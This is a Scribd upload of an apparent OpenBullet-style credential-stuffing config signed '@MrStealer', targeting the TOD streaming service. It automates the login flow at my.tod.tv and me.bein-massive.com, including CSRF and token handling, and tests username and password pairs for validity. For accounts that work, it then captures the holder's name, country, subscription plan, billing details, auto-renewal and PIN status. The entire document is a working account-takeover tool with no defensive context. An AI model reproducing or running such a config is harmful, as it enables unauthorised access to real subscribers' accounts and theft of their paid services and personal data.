Scribd
Upload
54 views8 pages

Tod

Uploaded by

united2007alani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
54 views8 pages

Tod

Uploaded by

united2007alani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 8

BLOCK:RandomString

LABEL:@MrStealer
input = "?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n"
=> VAR @MrStealerString
ENDBLOCK

BLOCK:UTF8ToBase64
LABEL:@MrStealer
input =
$"{\"rnd\":\"<MrStealerString>\",\"flow\":\"SignIn\",\"geo\":\"en\",\"path\":\"/\",
\"search\":\"\"}"
=> VAR @MrStealerBase64
ENDBLOCK

BLOCK:HttpRequest
LABEL:@MrStealer
url = $"https://my.tod.tv/d8afef6e-b6f7-42c8-8de0-b32127672088/oauth2/v2.0/
authorize?client_id=2c85bc7f-d35f-4b51-92a5-
42c1aa80ebb7&response_type=code+id_token&response_mode=query&scope=2c85bc7f-d35f-
4b51-92a5-42c1aa80ebb7%20openid
%20offline_access&state=<MrStealerBase64>&p=B2C_1A_sign_up_or_sign_in&redirect_uri=
https://www.tod.tv/en/signin&isPartner=false&ui_locales=en-
US&reset=B2C_1A_Password_Reset&signin=B2C_1A_sign_up_or_sign_in&backPath=/
&register=B2C_1A_register&referrer=bein"
httpLibrary = SystemNet
httpVersion = "2.0"
TYPE:STANDARD
$""
"application/x-www-form-urlencoded"
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.COOKIES["x-ms-cpim-csrf"]
MODE:LR
=> VAR @MrStealerCsrf
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "\"transId\":\"StateProperties="
rightDelim = "\""
MODE:LR
=> VAR @MrStealerStateProperties
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "\"pageViewId\":\""
rightDelim = "\""
MODE:LR
=> VAR @MrStealerId
ENDBLOCK

BLOCK:UrlEncode
LABEL:@MrStealer
input = $"<input.USER>"
=> VAR @US
ENDBLOCK

BLOCK:UrlEncode
LABEL:@MrStealer
input = $"<input.PASS>"
=> VAR @PS
ENDBLOCK

BLOCK:HttpRequest
LABEL:@MrStealer
url =
$"https://my.tod.tv/d8afef6e-b6f7-42c8-8de0-b32127672088/B2C_1A_sign_up_or_sign_in/
SelfAsserted?
tx=StateProperties=<MrStealerStateProperties>&p=B2C_1A_sign_up_or_sign_in"
method = POST
httpLibrary = SystemNet
customHeaders = ${("", "scheme: https"), ("accept", "application/json,
text/javascript, */*; q=0.01"), ("accept-encoding", "gzip, deflate, br"), ("accept-
language", "fr-FR,fr;q=0.9"), ("origin", "https://my.tod.tv"), ("referer",
"https://my.tod.tv/d8afef6e-b6f7-42c8-8de0-b32127672088/oauth2/v2.0/authorize?
client_id=2c85bc7f-d35f-4b51-92a5-
42c1aa80ebb7&response_type=code+id_token&response_mode=query&scope=2c85bc7f-d35f-
4b51-92a5-42c1aa80ebb7%20openid
%20offline_access&state=<MrStealerBase64>&p=B2C_1A_sign_up_or_sign_in&redirect_uri=
https://www.tod.tv/en/signin&isPartner=false&ui_locales=en-
US&reset=B2C_1A_Password_Reset&signin=B2C_1A_sign_up_or_sign_in&backPath=/
&register=B2C_1A_register&referrer=bein"), ("sec-ch-ua", "\" Not
A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\""), ("sec-
ch-ua-mobile", "?0"), ("sec-ch-ua-platform", "\"Windows\""), ("sec-fetch-dest",
"empty"), ("sec-fetch-mode", "cors"), ("sec-fetch-site", "same-origin"), ("user-
agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/102.0.0.0 Safari/537.36"), ("x-csrf-token", "<MrStealerCsrf>"), ("x-
requested-with", "XMLHttpRequest")}
httpVersion = "2.0"
TYPE:STANDARD
$"request_type=RESPONSE&signInName=<US>&password=<PS>"
"application/x-www-form-urlencoded"
ENDBLOCK

BLOCK:Keycheck
LABEL:@MrStealer
KEYCHAIN FAIL OR
STRINGKEY @data.SOURCE Contains "{\"status\":\"400\""
STRINGKEY @data.SOURCE Contains "Your username or password is incorrect"
KEYCHAIN SUCCESS OR
STRINGKEY @data.SOURCE Contains "{\"status\":\"200"
ENDBLOCK

BLOCK:HttpRequest
LABEL:@MrStealer
url =
$"https://my.tod.tv/d8afef6e-b6f7-42c8-8de0-b32127672088/B2C_1A_sign_up_or_sign_in/
api/CombinedSigninAndSignup/confirmed?
rememberMe=false&csrf_token=<MrStealerCsrf>&tx=<MrStealerStateProperties>&p=B2C_1A_
sign_up_or_sign_in&diags=%7B%22pageViewId%22%3A%22<MrStealerId>%22%2C%22pageId
%22%3A%22CombinedSigninAndSignup%22%2C%22trace%22%3A%5B%7B%22ac%22%3A%22T005%22%2C
%22acST%22%3A1655324624%2C%22acD%22%3A28%7D%2C%7B%22ac%22%3A%22T021%20-%20URL
%3Ahttps%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fme-static.beinstatic.com%2Fazure%2Fsignin.html%22%2C%22acST
%22%3A1655324623%2C%22acD%22%3A2717%7D%2C%7B%22ac%22%3A%22T019%22%2C%22acST
%22%3A1655324626%2C%22acD%22%3A15%7D%2C%7B%22ac%22%3A%22T004%22%2C%22acST
%22%3A1655324626%2C%22acD%22%3A8%7D%2C%7B%22ac%22%3A%22T003%22%2C%22acST
%22%3A1655324626%2C%22acD%22%3A30%7D%2C%7B%22ac%22%3A%22T035%22%2C%22acST
%22%3A1655324627%2C%22acD%22%3A0%7D%2C%7B%22ac%22%3A%22T030Online%22%2C%22acST
%22%3A1655324627%2C%22acD%22%3A0%7D%2C%7B%22ac%22%3A%22T002%22%2C%22acST
%22%3A1655324647%2C%22acD%22%3A0%7D%2C%7B%22ac%22%3A%22T018T010%22%2C%22acST
%22%3A1655324645%2C%22acD%22%3A1137%7D%5D%7D"
httpLibrary = SystemNet
customHeaders = ${("", "scheme: https"), ("accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"), ("accept-
encoding", "gzip, deflate, br"), ("accept-language", "fr-FR,fr;q=0.9"), ("referer",
"https://my.tod.tv/d8afef6e-b6f7-42c8-8de0-b32127672088/oauth2/v2.0/authorize?
client_id=2c85bc7f-d35f-4b51-92a5-
42c1aa80ebb7&response_type=code+id_token&response_mode=query&scope=2c85bc7f-d35f-
4b51-92a5-42c1aa80ebb7%20openid
%20offline_access&state=<MrStealerBase64>&p=B2C_1A_sign_up_or_sign_in&redirect_uri=
https://www.tod.tv/en/signin&isPartner=false&ui_locales=en-
US&reset=B2C_1A_Password_Reset&signin=B2C_1A_sign_up_or_sign_in&backPath=/
&register=B2C_1A_register&referrer=bein"), ("sec-ch-ua", "\" Not
A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\""), ("sec-
ch-ua-mobile", "?0"), ("sec-ch-ua-platform", "\"Windows\""), ("sec-fetch-dest",
"document"), ("sec-fetch-mode", "navigate"), ("sec-fetch-site", "same-origin"),
("sec-fetch-user", "?1"), ("upgrade-insecure-requests", "1"), ("user-agent",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/102.0.0.0 Safari/537.36")}
httpVersion = "2.0"
TYPE:STANDARD
$""
"application/x-www-form-urlencoded"
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.ADDRESS
leftDelim = "id_token="
MODE:LR
=> VAR @MrStealerToken
ENDBLOCK

BLOCK:HttpRequest
LABEL:@MrStealer
url = "https://me.bein-massive.com/api/authorization/sso?ff=idp%2Cldp%2Crpt%2Ccd
%2Chlr&lang=en-US"
method = POST
httpLibrary = SystemNet
customHeaders = {("", "scheme: https"), ("accept", "application/json"), ("accept-
encoding", "gzip, deflate, br"), ("accept-language", "fr-FR,fr;q=0.9"), ("origin",
"https://www.tod.tv"), ("referer", "https://www.tod.tv/"), ("sec-ch-ua", "\" Not
A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\""), ("sec-
ch-ua-mobile", "?0"), ("sec-ch-ua-platform", "\"Windows\""), ("sec-fetch-dest",
"empty"), ("sec-fetch-mode", "cors"), ("sec-fetch-site", "cross-site"), ("user-
agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/102.0.0.0 Safari/537.36")}
httpVersion = "2.0"
TYPE:STANDARD

$"{\"provider\":\"Azure\",\"token\":\"<MrStealerToken>\",\"device\":\"web_browser\"
,\"scopes\":[\"Catalog\"],\"workflow\":\"SignIn\"}"
"application/json"
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "\"value\":\""
rightDelim = "\""
jToken = $"value"
MODE:LR
=> VAR @MrStealerValue
ENDBLOCK

BLOCK:HttpRequest
LABEL:@MrStealer
url = "https://me.bein-massive.com/api/account?ff=idp%2Cldp%2Crpt%2Ccd%2Chlr
%2Cv2s&lang=en-US"
httpLibrary = SystemNet
customHeaders = ${("", "authority: me.bein-massive.com"), ("accept",
"application/json"), ("accept-encoding", "gzip, deflate, br, zstd"), ("accept-
language", "en-US,en;q=0.9"), ("origin", "https://www.tod.tv"), ("referer",
"https://www.tod.tv/"), ("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"), ("x-
authorization", "Bearer <MrStealerValue>")}
httpVersion = "2.0"
TYPE:STANDARD
$""
"application/x-www-form-urlencoded"
ENDBLOCK

BLOCK:Keycheck
LABEL:@MrStealer
KEYCHAIN CUSTOM OR
STRINGKEY @data.SOURCE Contains "\"subscriptions\":[],\""
KEYCHAIN SUCCESS OR
STRINGKEY @data.SOURCE Contains "\"subscriptions\":[{\"plan\""
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "firstName\":\""
rightDelim = "\","
MODE:LR
=> VAR @MrStealerF
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "lastName\":\""
rightDelim = "\","
MODE:LR
=> VAR @MrStealerL
ENDBLOCK

BLOCK:ConstantString
LABEL:@MrStealer
value = $"<MrStealerF> <MrStealerL>"
=> CAP @FullName
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "country\":\""
rightDelim = "\""
MODE:LR
=> VAR @MrStealerCountry
ENDBLOCK

BLOCK:Translate
LABEL:@MrStealer
input = @MrStealerCountry
translations = {("AF", "Afghanistan"), ("AX", "Åland Islands"), ("AL",
"Albania"), ("DZ", "Algeria"), ("AS", "American Samoa"), ("AD", "Andorra"), ("AO",
"Angola"), ("AI", "Anguilla"), ("AQ", "Antarctica"), ("AG", "Antigua and Barbuda"),
("AR", "Argentina"), ("AM", "Armenia"), ("AW", "Aruba"), ("AU", "Australia"),
("AT", "Austria"), ("AZ", "Azerbaijan"), ("BS", "Bahamas"), ("BH", "Bahrain"),
("BD", "Bangladesh"), ("BB", "Barbados"), ("BY", "Belarus"), ("BE", "Belgium"),
("BZ", "Belize"), ("BJ", "Benin"), ("BM", "Bermuda"), ("BT", "Bhutan"), ("BO",
"Bolivia "), ("BQ", "Bonaire"), ("BA", "Bosnia and Herzegovina"), ("BW",
"Botswana"), ("BV", "Bouvet Island"), ("BR", "Brazil"), ("IO", "British Indian
Ocean Territory"), ("BN", "Brunei Darussalam"), ("BG", "Bulgaria"), ("BF", "Burkina
Faso"), ("BI", "Burundi"), ("KH", "Cambodia"), ("CM", "Cameroon"), ("CA",
"Canada"), ("CV", "Cape Verde"), ("KY", "Cayman Islands"), ("CF", "Central African
Republic"), ("TD", "Chad"), ("CL", "Chile"), ("CN", "China"), ("CX", "Christmas
Island"), ("CC", "Cocos (Keeling) Islands"), ("CO", "Colombia"), ("KM", "Comoros"),
("CG", "Republic Congo"), ("CD", "Democratic Congo"), ("CK", "Cook Islands"),
("CR", "Costa Rica"), ("CI", "Côte d'Ivoire"), ("HR", "Croatia"), ("CU", "Cuba"),
("CW", "Curaçao"), ("CY", "Cyprus"), ("CZ", "Czech Republic"), ("DK", "Denmark"),
("DJ", "Djibouti"), ("DM", "Dominica"), ("DO", "Dominican Republic"), ("EC",
"Ecuador"), ("EG", "Egypt"), ("SV", "El Salvador"), ("GQ", "Equatorial Guinea"),
("ER", "Eritrea"), ("EE", "Estonia"), ("ET", "Ethiopia"), ("FK", "Falkland Islands
(Malvinas)"), ("FO", "Faroe Islands"), ("FJ", "Fiji"), ("FI", "Finland"), ("FR",
"France"), ("GF", "French Guiana"), ("PF", "French Polynesia"), ("TF", "French
Southern Territories"), ("GA", "Gabon"), ("GM", "Gambia"), ("GE", "Georgia"),
("DE", "Germany"), ("GH", "Ghana"), ("GI", "Gibraltar"), ("GR", "Greece"), ("GL",
"Greenland"), ("GD", "Grenada"), ("GP", "Guadeloupe"), ("GU", "Guam"), ("GT",
"Guatemala"), ("GG", "Guernsey"), ("GN", "Guinea"), ("GW", "Guinea-Bissau"), ("GY",
"Guyana"), ("HT", "Haiti"), ("HM", "Heard Island and McDonald Islands"), ("VA",
"Holy See (Vatican City State)"), ("HN", "Honduras"), ("HK", "Hong Kong"), ("HU",
"Hungary"), ("IS", "Iceland"), ("IN", "India"), ("ID", "Indonesia"), ("IR",
"Iran"), ("IQ", "Iraq"), ("IE", "Ireland"), ("IM", "Isle of Man"), ("IL",
"Israel"), ("IT", "Italy"), ("JM", "Jamaica"), ("JP", "Japan"), ("JE", "Jersey"),
("JO", "Jordan"), ("KZ", "Kazakhstan"), ("KE", "Kenya"), ("KI", "Kiribati"), ("KP",
"North Korea"), ("KR", "South Korea"), ("KW", "Kuwait"), ("KG", "Kyrgyzstan"),
("LA", "Lao People's Democratic Republic"), ("LV", "Latvia"), ("LB", "Lebanon"),
("LS", "Lesotho"), ("LR", "Liberia"), ("LY", "Libya"), ("LI", "Liechtenstein"),
("LT", "Lithuania"), ("LU", "Luxembourg"), ("MO", "Macao"), ("MK", "Macedonia"),
("MG", "Madagascar"), ("MW", "Malawi"), ("MY", "Malaysia"), ("MV", "Maldives"),
("ML", "Mali"), ("MT", "Malta"), ("MH", "Marshall Islands"), ("MQ", "Martinique"),
("MR", "Mauritania"), ("MU", "Mauritius"), ("YT", "Mayotte"), ("MX", "Mexico"),
("FM", "Micronesia"), ("MD", "Moldova"), ("MC", "Monaco"), ("MN", "Mongolia"),
("ME", "Montenegro"), ("MS", "Montserrat"), ("MA", "Morocco"), ("MZ",
"Mozambique"), ("MM", "Myanmar"), ("NA", "Namibia"), ("NR", "Nauru"), ("NP",
"Nepal"), ("NL", "Netherlands"), ("NC", "New Caledonia"), ("NZ", "New Zealand"),
("NI", "Nicaragua"), ("NE", "Niger"), ("NG", "Nigeria"), ("NU", "Niue"), ("NF",
"Norfolk Island"), ("MP", "Northern Mariana Islands"), ("NO", "Norway"), ("OM",
"Oman"), ("PK", "Pakistan"), ("PW", "Palau"), ("PS", "Palestine"), ("PA",
"Panama"), ("PG", "Papua New Guinea"), ("PY", "Paraguay"), ("PE", "Peru"), ("PH",
"Philippines"), ("PN", "Pitcairn"), ("PL", "Poland"), ("PT", "Portugal"), ("PR",
"Puerto Rico"), ("QA", "Qatar"), ("RE", "Réunion"), ("RO", "Romania"), ("RU",
"Russian Federation"), ("RW", "Rwanda"), ("BL", "Saint Barthélemy"), ("SH", "Saint
Helena"), ("KN", "Saint Kitts and Nevis"), ("LC", "Saint Lucia"), ("MF", "Saint
Martin (French part)"), ("PM", "Saint Pierre and Miquelon"), ("VC", "Saint Vincent
and the Grenadines"), ("WS", "Samoa"), ("SM", "San Marino"), ("ST", "Sao Tome and
Principe"), ("SA", "Saudi Arabia"), ("SN", "Senegal"), ("RS", "Serbia"), ("SC",
"Seychelles"), ("SL", "Sierra Leone"), ("SG", "Singapore"), ("SX", "Sint Maarten
(Dutch part)"), ("SK", "Slovakia"), ("SI", "Slovenia"), ("SB", "Solomon Islands"),
("SO", "Somalia"), ("ZA", "South Africa"), ("GS", "South Georgia and the South
Sandwich Islands"), ("SS", "South Sudan"), ("ES", "Spain"), ("LK", "Sri Lanka"),
("SD", "Sudan"), ("SR", "Suriname"), ("SJ", "Svalbard and Jan Mayen"), ("SZ",
"Swaziland"), ("SE", "Sweden"), ("CH", "Switzerland"), ("SY", "Syrian Arab
Republic"), ("TW", "Taiwan"), ("TJ", "Tajikistan"), ("TZ", "Tanzania"), ("TH",
"Thailand"), ("TL", "Timor-Leste"), ("TG", "Togo"), ("TK", "Tokelau"), ("TO",
"Tonga"), ("TT", "Trinidad and Tobago"), ("TN", "Tunisia"), ("TR", "Turkey"),
("TM", "Turkmenistan"), ("TC", "Turks and Caicos Islands"), ("TV", "Tuvalu"),
("UG", "Uganda"), ("UA", "Ukraine"), ("AE", "United Arab Emirates"), ("GB", "United
Kingdom"), ("US", "United States"), ("UM", "United States Minor Outlying Islands"),
("UY", "Uruguay"), ("UZ", "Uzbekistan"), ("VU", "Vanuatu"), ("VE", "Venezuela"),
("VN", "Viet Nam"), ("VG", "Virgin Islands"), ("VI", "Virgin Islands"), ("WF",
"Wallis and Futuna"), ("EH", "Western Sahara"), ("YE", "Yemen"), ("ZM", "Zambia"),
("ZW", "Zimbabwe")}
=> CAP @Country
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "\"title\":\""
rightDelim = "\","
MODE:LR
=> CAP @Plan
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "billingPeriodType\":\""
rightDelim = "\","
MODE:LR
=> CAP @PlanPeriod
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "currency\":\""
rightDelim = "\","
MODE:LR
=> CAP @Currency
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "isRenewable\":"
rightDelim = ",\""
MODE:LR
=> VAR @MrStealerRenew
ENDBLOCK

BLOCK:Translate
LABEL:@MrStealer
input = @MrStealerRenew
translations = {("true", "Yes"), ("false", "No")}
=> CAP @AutoRenew
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "usedFreeTrial\":"
rightDelim = ",\""
MODE:LR
=> VAR @MrStealerTrial
ENDBLOCK

BLOCK:Translate
LABEL:@MrStealer
input = @MrStealerTrial
translations = {("true", "Yes"), ("false", "No")}
=> CAP @FreeTrial
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "pinEnabled\":"
rightDelim = ",\""
MODE:LR
=> VAR @MrStealerPin
ENDBLOCK

BLOCK:Translate
LABEL:@MrStealer
input = @MrStealerPin
translations = {("true", "Yes"), ("false", "No")}
=> CAP @Pin
ENDBLOCK

BLOCK:HttpRequest
LABEL:@MrStealer
url = "https://me.bein-massive.com/api/account/billing/purchases?ff=idp%2Cldp
%2Crpt%2Ccd%2Chlr&lang=en-US"
httpLibrary = SystemNet
customHeaders = ${("", "authority: me.bein-massive.com"), ("accept",
"application/json"), ("accept-encoding", "gzip, deflate, br, zstd"), ("accept-
language", "en-US,en;q=0.9"), ("origin", "https://www.tod.tv"), ("referer",
"https://www.tod.tv/"), ("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"), ("x-
authorization", "Bearer <MrStealerValue>")}
httpVersion = "2.0"
TYPE:STANDARD
$""
"application/x-www-form-urlencoded"
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "\"invoiceDate\":\""
rightDelim = "\","
MODE:LR
=> CAP @SubscriptionStart
ENDBLOCK

BLOCK:Parse
LABEL:@MrStealer
input = @data.SOURCE
leftDelim = "\"status\":\""
rightDelim = "\"}"
MODE:LR
=> CAP @Status
ENDBLOCK

BLOCK:ConstantString
LABEL:@MrStealer
value = "@MrStealer"
=> CAP @ConfigBy
ENDBLOCK

You might also like